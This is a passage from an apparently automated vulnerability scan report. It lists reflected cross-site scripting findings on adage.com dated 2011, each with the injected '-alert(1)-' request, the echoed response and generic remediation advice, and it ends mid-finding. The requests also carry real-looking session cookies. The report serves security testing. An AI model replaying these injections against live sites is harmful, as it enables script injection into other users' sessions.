This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/style.cssc1369"-alert(1)-"9ba2570b3e6?1314816038 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9AB4972EC2EA092285A2E6874BB2EF8ADA12FA48; path=/
Set-Cookie: HMAC=09CC70A1868B8A6038E076787902DEDAA10DA461; path=/
Set-Cookie: HMAC=E745E080D7D5F6646934E0213D6781BD73F01693; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49449
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314816038";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/css/style.cssc1369"-alert(1)-"9ba2570b3e6"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.70. http://adage.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14808"-alert(1)-"d35674d75f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico14808"-alert(1)-"d35674d75f9 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: adage.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=30C2D1D39B1E1A15623774684483ACB979319AEA; path=/
Set-Cookie: HMAC=9CB6EA0A2A2E6597F6BA4794B8118BDE69EC7FE8; path=/
Set-Cookie: HMAC=7D093743476E6110F4B5FB973F4893EF30B218B2; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49498
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/favicon.ico14808"-alert(1)-"d35674d75f9"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.71. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc155"-alert(1)-"1fcd7946afc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagescc155"-alert(1)-"1fcd7946afc/bin/image/rightrail/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D1600A412EE3734F5764E96EB6E90B6F09AC02F1; path=/
Set-Cookie: HMAC=4F21A9B8720E8582CB1E7902FC00DAB122129625; path=/
Set-Cookie: HMAC=944F7955165834E3D6690116D923DFBCBBE2C738; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagescc155"-alert(1)-"1fcd7946afc/bin/image/rightrail/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="non
...[SNIP]...

1.72. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4003f"-alert(1)-"5cfe03c22a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin4003f"-alert(1)-"5cfe03c22a7/image/rightrail/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=91FD1AF79E146A23EDF6ED5FD0E338F19DE67F34; path=/
Set-Cookie: HMAC=D705306BDEB23364E79EC9CF7B5E7E08996A3643; path=/
Set-Cookie: HMAC=2DF24F40CB33DB4F878AD1ECC6001603CA9C5CEA; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin4003f"-alert(1)-"5cfe03c22a7/image/rightrail/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.73. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6f08"-alert(1)-"e00607392d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/imaged6f08"-alert(1)-"e00607392d2/rightrail/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8A3CEC8B4F57D60685B6EB9F6D9740F262E933B3; path=/
Set-Cookie: HMAC=12B37AD8FEEE3D18A06DEDE0FCD02E18AEC8EBE7; path=/
Set-Cookie: HMAC=37CF25731FE21FC42E68D8C0A70A5FD4A8959943; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/imaged6f08"-alert(1)-"e00607392d2/rightrail/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dl
...[SNIP]...

1.74. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ca4"-alert(1)-"9aba41bab09 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail54ca4"-alert(1)-"9aba41bab09/ad-age-app-devices.jpg?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=84EBDE8736920A4F9316C6B423740CF9A7BCBC5A; path=/
Set-Cookie: HMAC=B330E2C971BCC51A79A195555412E4A631E6DCF0; path=/
Set-Cookie: HMAC=BFBF99651C3F60D1294F22EFA5FFD48975E8D00F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail54ca4"-alert(1)-"9aba41bab09/ad-age-app-devices.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.75. http://adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/ad-age-app-devices.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7715a"-alert(1)-"74b81daadd4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail/ad-age-app-devices.jpg7715a"-alert(1)-"74b81daadd4?1309532605 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D962C730C8F5B93EEFEF501FB6BF75EF25C9CA62; path=/
Set-Cookie: HMAC=E35BA1741C38D5F50344578118EF21F0F9FE27E2; path=/
Set-Cookie: HMAC=83DC096C6BF4F9C2D4FA52647EBFADD473075713; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49485
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1309532605";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail/ad-age-app-devices.jpg7715a"-alert(1)-"74b81daadd4"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.76. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"da314f30353 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images59e74"-alert(1)-"da314f30353/bin/image/rightrail/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=DEB901EBF20FE647C99004393B14D3BF8A7C4373; path=/
Set-Cookie: HMAC=119F8377334A07E5F1AD7B795CFD1B710263D983; path=/
Set-Cookie: HMAC=6492A177801A39DD6C76B13636BA62B46638A44D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49489
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images59e74"-alert(1)-"da314f30353/bin/image/rightrail/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt=
...[SNIP]...

1.77. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c816"-alert(1)-"25cc12a59a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin2c816"-alert(1)-"25cc12a59a2/image/rightrail/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EB26C218D8E10BC0C4EA41070883EDFE1C9192DF; path=/
Set-Cookie: HMAC=7267AB09C3AD0356297297BD3D54B022C6826E12; path=/
Set-Cookie: HMAC=730FA87D4D2CB0AFB5B542705026EE1ED4154908; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49489
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin2c816"-alert(1)-"25cc12a59a2/image/rightrail/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="non
...[SNIP]...

1.78. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7d1"-alert(1)-"0f37756a12 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image3f7d1"-alert(1)-"0f37756a12/rightrail/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=FDC2745FA810E034250CB0FC6DE789D68C364EC7; path=/
Set-Cookie: HMAC=A280A41E31EA839D99BD7E6E0F223444AD929637; path=/
Set-Cookie: HMAC=6422D7EA191270A28126C15D80DA36C0CDC5863E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49488
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image3f7d1"-alert(1)-"0f37756a12/rightrail/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hb
...[SNIP]...

1.79. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fff7"-alert(1)-"3fade222f3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail4fff7"-alert(1)-"3fade222f3c/digitalalist-022811-rr.jpg?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3D43F266A0BC072AF7615592EB2858AF6C096891; path=/
Set-Cookie: HMAC=89A7E34C2F77D436B34718418F9E40C17FE5787F; path=/
Set-Cookie: HMAC=5091F94BA091246E26A3BE3005968DA62A85D5BC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49489
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
